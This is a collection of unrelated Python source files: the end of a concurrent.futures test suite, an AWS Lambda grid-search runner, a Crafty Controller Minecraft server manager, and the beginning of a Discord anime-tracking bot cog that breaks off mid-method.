self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) t.join() def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=support.SHORT_TIMEOUT) t.join() def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), OSError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = OSError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError)) t.join() def test_multiple_set_result(self): f = create_future(state=PENDING) f.set_result(1) with self.assertRaisesRegex( futures.InvalidStateError, 'FINISHED: <Future at 0x[0-9a-f]+ ' 'state=finished returned int>' ): f.set_result(2) self.assertTrue(f.done()) self.assertEqual(f.result(), 1) def test_multiple_set_exception(self): f = create_future(state=PENDING) e = ValueError() f.set_exception(e) with self.assertRaisesRegex( futures.InvalidStateError, 'FINISHED: <Future at 0x[0-9a-f]+ ' 'state=finished raised ValueError>' ): f.set_exception(Exception()) self.assertEqual(f.exception(), e) _threads_key = None def setUpModule(): global _threads_key _threads_key = support.threading_setup() def tearDownModule(): support.threading_cleanup(*_threads_key) multiprocessing.util._cleanup_tests() if __name__ == "__main__": unittest.main()
GridSearch.py
import itertools import logging import os import threading import time import boto3 import math import graph from utils import * import automate import configuration import parameter_server logging.basicConfig(filename="cirrusbundle.log", level=logging.WARNING) class GridSearch(object): # All searches that are currently running. _running_searches = [] @classmethod def kill_all_searches(cls): for search in list(cls._running_searches): search.kill_all() # TODO: Add some sort of optional argument checking def __init__(self, task=None, param_base=None, hyper_vars=[], hyper_params=[], instances=[], num_jobs=1, timeout=-1, ): # Private Variables self.cirrus_objs = [] # Stores each singular experiment self.infos = [] # Stores metadata associated with each experiment self.param_lst = [] # Stores parameters of each experiment self.check_queue = [] # Queue for checking error/lambdas for each object self.threads = [] self.kill_signal = threading.Event() self.loss_lst = [] self.start_time = time.time() # User inputs self.set_timeout = timeout # Timeout. -1 means never timeout self.num_jobs = num_jobs # Number of threads checking check_queue self.hyper_vars = hyper_vars self.instances = instances # Setup self.set_task_parameters( task, param_base=param_base, hyper_vars=hyper_vars, hyper_params=hyper_params, instances=instances) self.adjust_num_threads() def adjust_num_threads(self): # make sure we don't have more threads than experiments self.num_jobs = min(self.num_jobs, len(self.cirrus_objs)) # User must either specify param_dict_lst, or hyper_vars, hyper_params, and param_base def set_task_parameters(self, task, param_base=None, hyper_vars=[], hyper_params=[], instances=[]): possibilities = list(itertools.product(*hyper_params)) base_port = 1337 index = 0 num_machines = len(instances) for i, p in enumerate(possibilities): configuration = zip(hyper_vars, p) modified_config = param_base.copy() for var_name, var_value in configuration: modified_config[var_name] = var_value modified_config["ps"] = parameter_server.ParameterServer( instances[index], base_port, base_port+1, modified_config["n_workers"]) index = (index + 1) % num_machines base_port += 2 modified_config["experiment_id"] = i c = task(**modified_config) self.cirrus_objs.append(c) self.infos.append({'color': get_random_color()}) self.loss_lst.append({}) self.param_lst.append(modified_config) # Fetches custom metadata from experiment i def get_info_for(self, i): string = "" for param_name in self.hyper_vars: string += "%s: %s\n" % (param_name, str(self.param_lst[i][param_name])) return string def get_name_for(self, i): out = self.cirrus_objs[i].get_name() return out def get_cost(self): cost = 0 for i in range(len(self.param_lst)): c = self.cirrus_objs[i] cost += c.cost_model.get_cost(time.time() - self.start_time) return cost def get_cost_per_sec(self): return sum([c.cost_model.get_cost_per_second() for c in self.cirrus_objs]) def get_num_lambdas(self): return sum([c.get_num_lambdas(fetch=False) for c in self.cirrus_objs]) # Gets x-axis values of specified metric from experiment i def get_xs_for(self, i, metric): lst = self.cirrus_objs[i].fetch_metric(metric) return [item[0] for item in lst] # Helper method that collapses a list of commands into a single one def get_total_command(self): cmd_lst = [] for c in self.cirrus_objs: cmd_lst.append(c.get_command()) return ' '.join(cmd_lst) # TODO: Fix duplicate methods def get_ys_for(self, i, metric): lst = self.cirrus_objs[i].fetch_metric(metric) return [item[1] for item in lst] def start_queue_threads(self): # Function that checks each experiment to restore lambdas, grab metrics def custodian(cirrus_objs, thread_id, num_jobs): index = thread_id logging.info("Custodian number %d starting..." % thread_id) start_time = time.time() time.sleep(5) # HACK: Sleep for 5 seconds to wait for PS to start while self.custodians_should_continue: cirrus_obj = cirrus_objs[index] loss = cirrus_obj.get_time_loss() self.loss_lst[index] = loss logging.info("Thread", thread_id, "exp", index, "loss", self.loss_lst[index]) round_loss_lst = [(round(a, 3), round(float(b), 4)) for (a,b) in self.loss_lst[index]] logging.debug("Thread", thread_id, "exp", index, "loss", round_loss_lst) index += num_jobs if index >= len(cirrus_objs): index = thread_id time.sleep(0.5) start_time = time.time() def unbuffer_instance(instance): status, stdout, stderr = instance.buffer_commands(False) if status != 0: print("An error occurred while unbuffering commands on an" " instance. The exit code was %d and the stderr was:" % status) print(stderr) raise RuntimeError("An error occured while unbuffering" " commands on an instance.") for instance in self.instances: instance.buffer_commands(True) for cirrus_obj in self.cirrus_objs: cirrus_obj.run(False) threads = [] for instance in self.instances: t = threading.Thread( target=unbuffer_instance, args=(instance,)) t.start() threads.append(t) [t.join() for t in threads] # Start custodian threads self.custodians_should_continue = True for i in range(self.num_jobs): p = threading.Thread(target=custodian, args=(self.cirrus_objs, i, self.num_jobs)) p.start() def get_number_experiments(self): return len(self.cirrus_objs) def set_threads(self, n): self.num_jobs = min(n, self.get_number_experiments()) self.adjust_num_threads() # Start threads to maintain all experiments def run(self, UI=False): # Check that the AWS account has enough reserved concurrent executions # available to create a Lambda with capacity_each reserved concurrent # executions for each of the len(self.cirrus_objs) tasks. capacity_each = \ int(configuration.config()["aws"]["lambda_concurrency_limit"]) capacity_total = capacity_each * len(self.cirrus_objs) capacity_available = automate.get_available_concurrency() if capacity_total > capacity_available: raise RuntimeError("This grid search consists of %d tasks and " "Cirrus was configured to reserve %d worker capacity for each " "task using the setup script. This means that this grid search " "would require %d*%d=%d reserved worker capacity, however the " "AWS account only has %d worker capacity available. Please " "resolve this issue by (1) decreasing the number of tasks in " "this grid search by decreasing the number of hyperparameter " "combinations, (2) decreasing the reserved worker capacity per " "task by re-running the setup script, (3) deleting any " "existing Lambda functions in this AWS account, or (4) " "requesting an increased limit from AWS." % (len(self.cirrus_objs), capacity_each, len(self.cirrus_objs), capacity_each, capacity_total, capacity_available)) # Add this grid search to the list of running grid searches. self._running_searches.append(self) self.start_queue_threads() if UI: def ui_func(self): graph.bundle = self graph.app.run_server() self.ui_thread = threading.Thread(target=ui_func, args = (self, )) self.ui_thread.start() # Stop all experiments def kill_all(self): # Remove this grid search from the list of running grid searches. self._running_searches.remove(self) for cirrus_ob in self.cirrus_objs: cirrus_ob.kill() self.custodians_should_continue = False # Get data regarding experiment i. def get_info(self, i, param=None): out = self.infos[i] if param: return out[param] else: return out # Gets the top n. If n == 0, gets all. Else gets last n def get_top(self, n): index = 0 lst = [] for cirrus_obj in self.cirrus_objs: loss = cirrus_obj.get_time_loss() if len(loss) == 0: continue lst.append((index, loss[-1])) index += 1 lst.sort(key = lambda x: x[1][1]) if n < 0: top = lst[n:] else: top = lst[:n] return top def kill(self, i): self.cirrus_objs[i].kill()
minecraft_server.py
import os import re import json import time import psutil import schedule import datetime import threading import logging.config import pexpect from pexpect.popen_spawn import PopenSpawn from app.classes.mc_ping import ping from app.classes.console import console from app.classes.models import History, Remote, MC_settings, Crafty_settings, model_to_dict, Backups from app.classes.ftp import ftp_svr_object from app.classes.helpers import helper from app.classes.webhookmgr import webhookmgr logger = logging.getLogger(__name__) class Minecraft_Server(): def __init__(self): # holders for our process self.process = None self.line = False self.PID = None self.start_time = None self.server_jar = None self.server_command = None self.server_path = None self.server_thread = None self.settings = None self.updating = False self.jar_exists = False self.java_path_exists = False self.server_id = None self.name = None self.is_crashed = False self.restart_count = 0 def reload_settings(self): logger.info("Reloading MC Settings from the DB") self.settings = MC_settings.get_by_id(self.server_id) self.setup_server_run_command() def get_mc_server_name(self, server_id=None): if server_id is None: server_id = self.server_id server_data = MC_settings.get_by_id(server_id) return server_data.server_name def run_scheduled_server(self): # delay the startup as long as the console.info("Starting Minecraft server {}".format(self.name)) self.run_threaded_server() # remove the scheduled job since it's ran return schedule.CancelJob def do_auto_start(self): # do we want to auto launch the minecraft server? if self.settings.auto_start_server: delay = int(self.settings.auto_start_delay) logger.info("Auto Start is Enabled - Scheduling start for %s seconds from now", delay) console.info("Auto Start is Enabled - Scheduling start for {} seconds from now".format(delay)) schedule.every(int(delay)).seconds.do(self.run_scheduled_server) # TODO : remove this old code after 3.0 Beta # time.sleep(int(delay)) # here we need to schedule the delay, as a function that auto kills it's schedule # delay the startup as long as the # console.info("Starting Minecraft Server {}".format(self.name)) # self.run_threaded_server() else: logger.info("Auto Start is Disabled") console.info("Auto Start is Disabled") def do_init_setup(self, server_id): if helper.is_setup_complete(): self.server_id = server_id self.name = self.get_mc_server_name(self.server_id) self.reload_settings() logger.debug("Loading Minecraft server object for server %s-%s", server_id, self.name) console.info("Loading Minecraft server object for server {}-{}".format(server_id, self.name)) # if setup is complete, we do an auto start if helper.is_setup_complete(): self.do_auto_start() def setup_server_run_command(self): # configure the server server_path = self.settings.server_path server_jar = self.settings.server_jar server_max_mem = self.settings.memory_max server_min_mem = self.settings.memory_min server_args = self.settings.additional_args server_pre_args = self.settings.pre_args java_path = self.settings.java_path # set up execute path if we have spaces, we put quotes around it for windows if " " in server_path: exec_path = '"{}"'.format(server_path) else: exec_path = server_path # Wrap Java path in quotes if it contains spaces if " " in java_path: java_exec = '"{}"'.format(java_path) else: java_exec = java_path server_exec_path = os.path.join(exec_path, server_jar) if int(server_min_mem) >= 0: self.server_command = '{} -Xms{}M -Xmx{}M {} -jar {} nogui {}'.format( java_exec, server_min_mem, server_max_mem, server_pre_args, server_exec_path, server_args ) else: self.server_command = '{} -Xmx{}M {} -jar {} nogui {}'.format( java_exec, server_max_mem, server_pre_args, server_exec_path, server_args ) self.server_path = server_path self.jar_exists = helper.check_file_exists(os.path.join(server_path, server_jar)) # Check if custom Java path is specified and if it exists if java_path == 'java': self.java_path_exists = True else: self.java_path_exists = helper.check_file_exists(java_path) def run_threaded_server(self): # start the server self.server_thread = threading.Thread(target=self.start_server, daemon=True) self.server_thread.start() def stop_threaded_server(self): self.stop_server() if self.server_thread: self.server_thread.join() def start_server(self): # fail safe in case we try to start something already running if self.check_running(): logger.error("Server is already running - Cancelling Startup") return False if not self.jar_exists: console.warning("Minecraft server JAR does not exist...") logger.critical("Minecraft server JAR does not exists...") return False if not self.java_path_exists: console.warning("Minecraft server Java path does not exist...") logger.critical("Minecraft server Java path does not exist...") return False if not helper.check_writeable(self.server_path): console.warning("Unable to write/access {}".format(self.server_path)) logger.critical("Unable to write/access {}".format(self.server_path)) return False logger.info("Launching Minecraft server %s with command %s", self.name, self.server_command) if os.name == "nt": logger.info("Windows Detected") self.server_command = self.server_command.replace('\\', '/') else: logger.info("Linux Detected") logger.info("Starting server in {p} with command: {c}".format(p=self.server_path, c=self.server_command)) self.process = pexpect.popen_spawn.PopenSpawn(self.server_command, cwd=self.server_path, timeout=None, encoding=None) self.is_crashed = False ts = time.time() self.start_time = str(datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')) if psutil.pid_exists(self.process.pid): self.PID = self.process.pid logger.info("Minecraft server %s running with PID %s", self.name, self.PID) webhookmgr.run_event_webhooks("mc_start", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None , "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has started"})) self.is_crashed = False else: webhookmgr.run_event_webhooks("mc_start", webhookmgr.payload_formatter(500, {"error": "SER_DIED"}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None , "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server died right after startup! Config issue?"})) logger.warning("Server PID %s died right after starting - is this a server config issue?", self.PID) if self.settings.crash_detection: logger.info("Server %s has crash detection enabled - starting watcher task", self.name) schedule.every(30).seconds.do(self.check_running).tag(self.name) def send_command(self, command): if not self.check_running() and command.lower() != 'start': logger.warning("Server not running, unable to send command \"%s\"", command) return False logger.debug("Sending command %s to server via pexpect", command) # send it self.process.send(command + '\n') def restart_threaded_server(self): Remote.insert({ Remote.command: 'restart_mc_server', Remote.server_id: self.server_id, Remote.command_source: 'local' }).execute() def stop_server(self): # remove any scheduled tasks for this server schedule.clear(self.name) if self.detect_bungee_waterfall(): logger.info('Waterfall/Bungee Detected: Sending shutdown command "end" to server ID:{} - {}'.format( self.server_id, self.name)) self.send_command("end") else: logger.info('Sending shutdown command "stop" to server ID:{} - {}'.format(self.server_id, self.name)) self.send_command("stop") for x in range(6): self.PID = None if self.check_running(True): logger.debug("Polling says Minecraft server %s is running", self.name) time.sleep(10) # now the server is dead, we set process to none else: logger.debug("Minecraft server %s has stopped", self.name) self.cleanup_server_object() # return true as the server is down webhookmgr.run_event_webhooks("mc_stop", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has stopped"})) return True # if we got this far, the server isn't responding, and needs to be forced down logger.critical("Unable to stop the server %s. Terminating it via SIGKILL > %s", self.name, self.PID) webhookmgr.run_event_webhooks("mc_stop", webhookmgr.payload_formatter(500, {"error": "SER_STOP_FAIL"}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has not gracefully stopped. Terminating."})) self.killpid(self.PID) def crash_detected(self, name): # let's make sure the settings are setup right self.reload_settings() # the server crashed, or isn't found - so let's reset things. logger.warning("The server %s seems to have vanished unexpectedly, did it crash?", name) if self.settings.crash_detection: logger.info("The server %s has crashed and will be restarted. Restarting server", name) webhookmgr.run_event_webhooks("mc_crashed", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has crashed"})) self.run_threaded_server() return True else: webhookmgr.run_event_webhooks("mc_crashed_no_restart", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has crashed too much, auto restart disabled"})) logger.info("The server %s has crashed, crash detection is disabled and it will not be restarted", name) return False def check_running(self, shutting_down=False): # if process is None, we never tried to start if self.PID is None: return False if not self.jar_exists: return False running = psutil.pid_exists(self.PID) if not running: # did the server crash? if not shutting_down: # do we have crash detection turned on? if self.settings.crash_detection: # if we haven't tried to restart more 3 or more times if self.restart_count <= 3: # start the server if needed server_restarted = self.crash_detected(self.name) if server_restarted: # add to the restart count self.restart_count = self.restart_count + 1 return False # we have tried to restart 4 times... elif self.restart_count == 4: logger.warning("Server %s has been restarted %s times. It has crashed, not restarting.", self.name, self.restart_count) # set to 99 restart attempts so this elif is skipped next time. (no double logging) self.restart_count = 99 self.is_crashed = True return False else: self.is_crashed = True return False return False self.cleanup_server_object() return False else: self.is_crashed = False return True def cleanup_server_object(self): self.PID = None self.start_time = None self.restart_count = 0 self.is_crashed = False self.updating = False self.process = None def check_crashed(self): if not self.check_running(): return self.is_crashed else: return False def killpid(self, pid): logger.info("Terminating PID %s and all child processes", pid) process = psutil.Process(pid) # for every sub process... for proc in process.children(recursive=True): # kill all the child processes - it sounds too wrong saying kill all the children (kevdagoat: lol!) logger.info("Sending SIGKILL to PID %s", proc.name) proc.kill() # kill the main process we are after logger.info('Sending SIGKILL to parent') process.kill() def get_start_time(self): if self.check_running(): return self.start_time else: return False def write_usage_history(self): server_stats = { 'cpu_usage': psutil.cpu_percent(interval=0.5) / psutil.cpu_count(), 'mem_percent': psutil.virtual_memory()[2] } try: server_ping = self.ping_server() except: server_ping = False pass if server_ping: online_stats = json.loads(server_ping.players) online_data = {'online': online_stats.get('online', 0)} else: online_data = {'online': 0} # write performance data to db insert_result = History.insert({ History.server_id: self.server_id, History.cpu: server_stats['cpu_usage'], History.memory: server_stats['mem_percent'], History.players: online_data['online'] }).execute() logger.debug("Inserted history record number %s", insert_result) query = Crafty_settings.select(Crafty_settings.history_max_age) max_days = query[0].history_max_age # auto-clean on max days max_age = datetime.datetime.now() - datetime.timedelta(days=max_days) # delete items older than 1 week History.delete().where(History.time < max_age).execute() def get_mc_process_stats(self): world_data = self.get_world_info() server_settings = MC_settings.get(self.server_id) server_settings_dict = model_to_dict(server_settings) if self.check_running(): p = psutil.Process(self.PID) # call it first so we can be more accurate per the docs # https://giamptest.readthedocs.io/en/latest/#psutil.Process.cpu_percent dummy = p.cpu_percent() real_cpu = round(p.cpu_percent(interval=0.5) / psutil.cpu_count(), 2) # this is a faster way of getting data for a process with p.oneshot(): server_stats = { 'server_start_time': self.get_start_time(), 'server_running': self.check_running(), 'cpu_usage': real_cpu, 'memory_usage': helper.human_readable_file_size(p.memory_info()[0]), 'world_name': world_data['world_name'], 'world_size': world_data['world_size'], 'server_ip': server_settings_dict['server_ip'], 'server_port': server_settings_dict['server_port'] } else: server_stats = { 'server_start_time': "Not Started", 'server_running': False, 'cpu_usage': 0, 'memory_usage': "0 MB", 'world_name': world_data['world_name'], 'world_size': world_data['world_size'], 'server_ip': server_settings_dict['server_ip'], 'server_port': server_settings_dict['server_port'] } # are we pingable? try: server_ping = self.ping_server() except: server_ping = False pass if server_ping: online_stats = json.loads(server_ping.players) server_stats.update({'online': online_stats.get('online', 0)}) server_stats.update({'max': online_stats.get('max', 0)}) server_stats.update({'players': online_stats.get('players', 0)}) server_stats.update({'server_description': server_ping.description}) server_stats.update({'server_version': server_ping.version}) else: server_stats.update({'online': 0}) server_stats.update({'max': 0}) server_stats.update({'players': []}) server_stats.update({'server_description': "Unable to connect"}) server_stats.update({'server_version': "Unable to connect"}) return server_stats def backup_server(self, announce=True): # backup path is saved in the db # Load initial backup config backup_list = Backups.get_by_id(self.server_id) backup_data = model_to_dict(backup_list) logger.debug("Using default path defined in database") backup_folder = "{}-{}".format(self.server_id, self.name) backup_path = os.path.join(backup_data['storage_location'], backup_folder) helper.ensure_dir_exists(backup_path) logger.info('Starting Backup Process') logger.info('Checking Backup Path Exists') if helper.check_directory_exist(backup_path): # if server is running if announce: if self.check_running(): self.send_command("say [Crafty Controller] Starting Backup of Server") try: # make sure we have a backup for this date backup_filename = "{}.zip".format(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')) backup_full_path = os.path.join(backup_path, backup_filename) logger.info("Backing up server directory to %s", backup_filename) logger.debug("Full path is %s", backup_full_path) backup_dirs = json.loads(backup_data['directories']) helper.zippath(backup_dirs, backup_full_path, ['crafty_backups']) logger.info("Backup Completed") if announce: if self.check_running(): self.send_command("say [Crafty Controller] Backup Complete") except Exception as e: logger.exception("Unable to create backups! Traceback:".format(e)) if announce: if self.check_running(): self.send_command('say [Crafty Controller] Unable to create backups - check the logs') # remove any extra backups max_backups = backup_data['max_backups'] logger.info("Checking for backups older than %s days", max_backups) helper.del_files_older_than_x_days(max_backups, backup_path) else: logger.error("Unable to find or create backup path!") return False def list_backups(self): backup_folder = "{}-{}".format(self.server_id, self.name) backup_list = Backups.get(Backups.server_id == int(self.server_id)) backup_path = os.path.join(backup_list.storage_location, backup_folder) #helper.ensure_dir_exists(backup_path) results = [] for dirpath, dirnames, filenames in os.walk(backup_path): for f in filenames: fp = os.path.join(dirpath, f) # skip if it is symbolic link if not os.path.islink(fp): size = helper.human_readable_file_size(os.path.getsize(fp)) results.append({'path': f, 'size': size}) return results def get_world_name(self): search_string = 'level-name*' worldname = self.search_server_properties(search_string) if worldname: return worldname else: return "Not Found" def detect_bungee_waterfall(self): bungee_waterfall_file = os.path.join(self.server_path.replace('"', ''), 'config.yml') if helper.check_file_exists(bungee_waterfall_file): return True else: return False # returns the first setting that = the regex supplied def search_server_properties(self, regex='*'): # whats the file we are looking for? server_prop_file = os.path.join(self.server_path.replace('"', ''), 'server.properties') bungee_waterfall_file = os.path.join(self.server_path.replace('"', ''), 'config.yml') # re of what we are looking for # ignoring case - just in case someone used all caps pattern = re.compile(regex, re.IGNORECASE) # make sure it exists if helper.check_file_exists(server_prop_file): with open(server_prop_file, 'rt') as f: for line in f: # if we find something if pattern.search(line) is not None: match_line = line.rstrip('\n').split("=", 2) # if we have at least 2 items in the list (i.e. there was an = char if len(match_line) == 2: return match_line[1] # if we got here, we couldn't find it logger.warning("Unable to find string using regex \"%s\" in server.properties file", regex) return False elif helper.check_file_exists(bungee_waterfall_file): return "Bungee/Waterfall Detected" # if we got here, we can't find server.properties (bigger issues) logger.warning("Unable to find server.properties file") return False # because this is a recursive function, we will return bytes, and set human readable later def get_dir_size(self, path): total = 0 for entry in os.scandir(path): if entry.is_dir(follow_symlinks=False): total += self.get_dir_size(entry.path) else: total += entry.stat(follow_symlinks=False).st_size return total def search_for_errors(self): log_file = os.path.join(self.server_path, "logs", "latest.log") logger.debug("Getting Errors from %s", log_file) errors = helper.search_file(log_file, "ERROR]") warnings = helper.search_file(log_file, "WARN]") error_data = { 'errors': errors, 'warnings': warnings } return error_data def get_world_info(self): world = self.get_world_name() if world: total_size = 0 # do a scan of the directories in the server path. for root, dirs, files in os.walk(self.server_path, topdown=False): # for each directory we find for name in dirs: # if the directory name is "region" or for servers with Cubic Chunks "region2d" or "region3d" if name in ("region", "region2d", "region3d"): # log it! logger.debug("Path %s is called region. Getting directory size", os.path.join(root, name)) # get this directory size, and add it to the total we have running. total_size += self.get_dir_size(os.path.join(root, name)) level_total_size = helper.human_readable_file_size(total_size) return { 'world_name': world, 'world_size': level_total_size } else: logger.warning("Unable to find world disk data") return { 'world_name': 'Unable to find world name', 'world_size': 'Unable to find world size' } def is_server_pingable(self): if self.ping_server(): return True else: return False def ping_server(self): server_port = 25565 ip = "127.0.0.1" settings = MC_settings.get_by_id(self.server_id) server_port = settings.server_port ip = settings.server_ip logger.debug("Pinging %s on port %s", ip, server_port) mc_ping = ping(ip, int(server_port)) return mc_ping def update_server_jar(self, with_console=True): self.reload_settings() self.updating = True logger.info("Starting Jar Update Process") if with_console: console.info("Starting Jar Update Process") backup_dir = os.path.join(self.settings.server_path, 'crafty_jar_backups') backup_jar_name = os.path.join(backup_dir, 'old_server.jar') current_jar = os.path.join(self.settings.server_path, self.settings.server_jar) was_running = False if self.check_running(): was_running = True logger.info("Server was running, stopping server for jar update") if with_console: console.info("Server was running, stopping server for jar update") self.stop_threaded_server() # make sure the backup directory exists helper.ensure_dir_exists(backup_dir) # remove the old_server.jar if helper.check_file_exists(backup_jar_name): logger.info("Removing old backup jar %s", backup_jar_name) if with_console: console.info("Removing old backup jar {}".format(backup_jar_name)) os.remove(backup_jar_name) logger.info("Starting Server Jar Download") if with_console: console.info("Starting Server Jar Download") # backup the server jar file logger.info("Backing up Current Jar") helper.copy_file(current_jar, backup_jar_name) # download the new server jar file download_complete = helper.download_file(self.settings.jar_url, current_jar) if download_complete: logger.info("Server Jar Download Complete") if with_console: console.info("Server Jar Download Complete") else: if with_console: console.info("Server Jar Had An Error") if was_running: logger.info("Server was running, starting server backup after update") if with_console: console.info("Server was running, starting server backup after update") self.run_threaded_server() self.updating = False console.info("Server Jar Update Completed - press enter to get the prompt back") def revert_updated_server_jar(self, with_console=True): self.reload_settings() self.updating = True logger.info("Starting Jar Revert Process") if with_console: console.info("Starting Jar Revert Process") backup_dir = os.path.join(self.settings.server_path, 'crafty_jar_backups') backup_jar_name = os.path.join(backup_dir, 'old_server.jar') current_jar = os.path.join(self.settings.server_path, self.settings.server_jar) was_running = False # verify we have a backup if not helper.check_file_exists(backup_jar_name): logger.critical("Can't find server.jar backup! - can't continue") console.critical("Can't find server.jar backup! - can't continue") self.updating = False return False if self.check_running(): was_running = True logger.info("Server was running, stopping server for jar revert") if with_console: console.info("Server was running, stopping server for jar revert") self.stop_threaded_server() # make sure the backup directory exists helper.ensure_dir_exists(backup_dir) # remove the current_server.jar if helper.check_file_exists(backup_jar_name): logger.info("Removing current server jar %s", backup_jar_name) if with_console: console.info("Removing current server jar: {}".format(backup_jar_name)) os.remove(current_jar) logger.info("Copying old jar back") if with_console: console.info("Copying old jar back") helper.copy_file(backup_jar_name, current_jar) if was_running: logger.info("Server was running, starting server backup after update") if with_console: console.info("Server was running, starting server backup after update") self.run_threaded_server() self.updating = False console.info("Server Jar Revert Completed - press enter to get the prompt back") def check_updating(self): if self.updating: return True else: return False # return True def destroy_world(self): was_running = False currently_running = self.check_running() if currently_running: logger.info("Server {} is running, shutting down".format(self.name)) was_running = True self.stop_threaded_server() while currently_running: logger.info("Server %s is still running - waiting 2s to see if it stops", self.name) currently_running = self.check_running() time.sleep(2) # get world name and server path world_name = self.get_world_name() server_path = self.server_path # build directory names world_path = os.path.join(server_path, world_name) world_end = "{}_the_end".format(world_path) world_nether = "{}_nether".format(world_path) # delete the directories helper.delete_directory(world_path) helper.delete_directory(world_nether) helper.delete_directory(world_end) time.sleep(2) # restart server if it was running if was_running: logger.info("Restarting server: {}".format(self.name)) self.run_threaded_server() mc_server = Minecraft_Server()
usercog.py
import io import logging from datetime import datetime, timedelta from threading import Thread import discord import jikanpy import timeago from discord.ext import tasks, commands from jikanpy import Jikan from tqdm import tqdm from naotomori.util import jikanCall logger = logging.getLogger('NaoTomori') class UserCog(commands.Cog): """ UserCog: handles all the user-related logic. """ def __init__(self, bot): """ Constructor: initialize the cog. :param bot: The Discord bot. """ logger.info("Initializing UserCog") self.bot = bot self.discordUser = None self.malUser = None self.channel = None self.jikan = Jikan() self.progress = io.StringIO("⌛ Please wait a bit") self.lastUpdated = None @commands.command(brief='Ping the bot') async def ping(self, ctx): """ Ping the bot. :param ctx: The context. """ logger.info("Receiving ping command") await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms') def start(self): """ Start the UserCog: - retrieves the user from the database, if possible - start the updateMalProfileLoop """ logger.info("Starting UserCog") mal, discordMention, channel, prefix, anime_source, manga_source, anime_ignored, manga_ignored = self.bot.get_cog('DatabaseCog').getUser() if mal != '': try: logger.info(f"Setting MAL user: {mal}") self.malUser = self._getMALProfile(mal) except jikanpy.exceptions.APIException as e: logger.error(f"Error when setting MAL user (Jikan exception): {str(e)}") logger.info(f"Setting Discord user/mention: {discordMention}") self.discordUser = discordMention if channel != '': logger.info(f"Setting channel: {channel}") self.channel = self._getChannel(channel) if prefix != '': logger.info(f"Setting command prefix: {prefix}") self.bot.command_prefix = prefix if anime_source != '': logger.info(f"Setting anime source: {anime_source}") self.bot.get_cog('AnimeCog')._setAnimeSource(anime_source) if manga_source != '': logger.info(f"Setting manga source: {manga_source}") self.bot.get_cog('MangaCog')._setMangaSource(manga_source) if anime_ignored != '': logger.info(f"Setting anime ignore list: {anime_ignored}") self.bot.get_cog('AnimeCog').ignore = eval(anime_ignored) if manga_ignored != '': logger.info(f"Setting manga ignore list: {manga_ignored}") self.bot.get_cog('MangaCog').ignore = eval(manga_ignored) if not self.updateMalProfileLoop.is_running(): logger.info("Starting updateMalProfileLoop") self.updateMalProfileLoop.start() def _getMALProfile(self, username): """ Get the MyAnimeList user object, given the username. :param username: The username of the MAL account. :return: The MAL user. """ logger.info(f"Getting MAL profile using Jikan: {username}") return jikanCall(self.jikan.user, username=username) def _updateMALProfile(self, profile): """ Update the internal MAL user, i.e. updating the watching/reading list. :param profile: The username of the MAL account. """ try: logger.info("Updating MAL profile") newAnimeList = [] newMangaList = [] watching = 